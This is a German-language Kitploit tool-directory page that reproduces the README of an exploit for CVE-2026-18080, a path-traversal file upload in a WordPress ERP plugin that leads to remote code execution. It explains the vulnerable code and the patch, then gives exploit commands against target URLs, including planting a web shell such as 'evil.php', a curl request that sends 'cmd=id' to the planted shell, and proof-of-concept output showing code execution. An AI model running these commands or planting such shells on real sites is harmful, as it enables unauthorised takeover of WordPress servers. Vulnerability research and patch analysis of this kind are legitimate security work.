Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
By-Poloss..-..CVE-2026-18080 — Exploit für CVE-2026-18080, einen nicht authentifizierten, beliebigen Datei-Upload, der zu RCE in ERP Complete HR, Accounting & CRM Suite führt. Enthält Python- und PHP-Skripte für die automatisierte Ausnutzung. | Kitploit
Tools/GitHubGitHub/polosss/by-poloss..-..cve-2026-18080
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubpolosss/by-poloss..-..cve-2026-18080

By-Poloss..-..CVE-2026-18080

Exploit für CVE-2026-18080, einen nicht authentifizierten, beliebigen Datei-Upload, der zu RCE in ERP Complete HR, Accounting & CRM Suite führt. Enthält Python- und PHP-Skripte für die automatisierte Ausnutzung.

Repository anzeigen
vor 19h 38mNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-18080 — ERP Complete HR, Accounting & CRM Suite <= 1.17.7

Nicht authentifizierter beliebiger Datei-Upload über CRM-E-Mail-Connect-IMAP-Anhang (Path Traversal → RCE)

FeldWert
CVEhttps://nvd.nist.gov/vuln/detail/CVE-2026-18080
Wordfencehttps://www.wordfence.com/threat-intel/vulnerabilities/id/b9d11eb9-5e18-459f-a9d4-cccb1d593402
Patchhttps://plugins.trac.wordpress.org/changeset/3656848/erp
CVSS9.8 (Kritisch)
CWECWE-434 (Unbeschränkter Upload von Dateien mit gefährlichem Typ)
BetroffenERP-Plugin-Versionen <= 1.17.7 (behoben in 1.17.8)

Beschreibung

Die save_attachments()-Funktion des ERP-Plugins in GmailSync.php verarbeitet eingehende E-Mail-Anhänge von IMAP ohne Pfadnormalisierung. Ein Angreifer kann eine E-Mail mit einem Dateinamen wie ../../plugins/shell.php und einem gefälschten References-Header, der dem erwarteten Muster des Plugins entspricht, erstellen. Der cron-basierte IMAP-Synchronisierungsjob schreibt die Datei außerhalb des durch .htaccess geschützten Verzeichnisses crm-attachments/ in einen beliebigen beschreibbaren Pfad unter wp-content/.

Ursache

In GmailSync.php (v1.17.7):

root@kitploit:~
$name = $item['name'];              // Keine basename()- oder Pfadnormalisierung
$file = wp_check_filetype( $item['name'] );
// ...
$saved = $wp_filesystem->put_contents( $dir . $name, $item['data'] );

Der Dateiname ../../plugins/shell.php, verkettet mit $dir (wp-content/uploads/crm-attachments/), löst zu wp-content/plugins/shell.php auf — ein Verzeichnis, in dem die Ausführung von PHP erlaubt ist.

Der Fix (v1.17.8) fügt sanitize_attachment_filename() hinzu, das Verzeichniskomponenten über basename() entfernt, Pfadtrennzeichen ablehnt und gefährliche Erweiterungen blockiert.

Ausnutzung

Methode 1: Direkt (wp-cli)

root@kitploit:~
python3 exploit.py -t https://wordpress.ddev.site

Methode 2: Benutzerdefinierter Pfad und Shell-Name

root@kitploit:~
python3 exploit.py -t https://target.com --shell evil.php --path themes

Methode 3: phpinfo-Sonde

root@kitploit:~
python3 exploit.py -t https://target.com --phpinfo

Nach erfolgreichem Upload:

root@kitploit:~
curl -X POST -d 'cmd=id' 'https://target.com/wp-content/plugins/cve-2026-18080.php'

Proof of Concept

root@kitploit:~
RESULT: [{"name":"../../plugins/cve-2026-18080.php","slug":"../../plugins/cve-2026-18080.php","path":".../crm-attachments/../../plugins/cve-2026-18080.php"}]
SUCCESS: wp-content/plugins/cve-2026-18080.php (57 bytes)
RCE: uid=1000(god) gid=1000(god)

Dateien

DateiBeschreibung
exploit.pyPython-Exploit-Skript mit wp-cli
exploit.phpEigenständiger PHP-Exploit für wp eval-file
README.mdDiese Datei
Tool herunterladen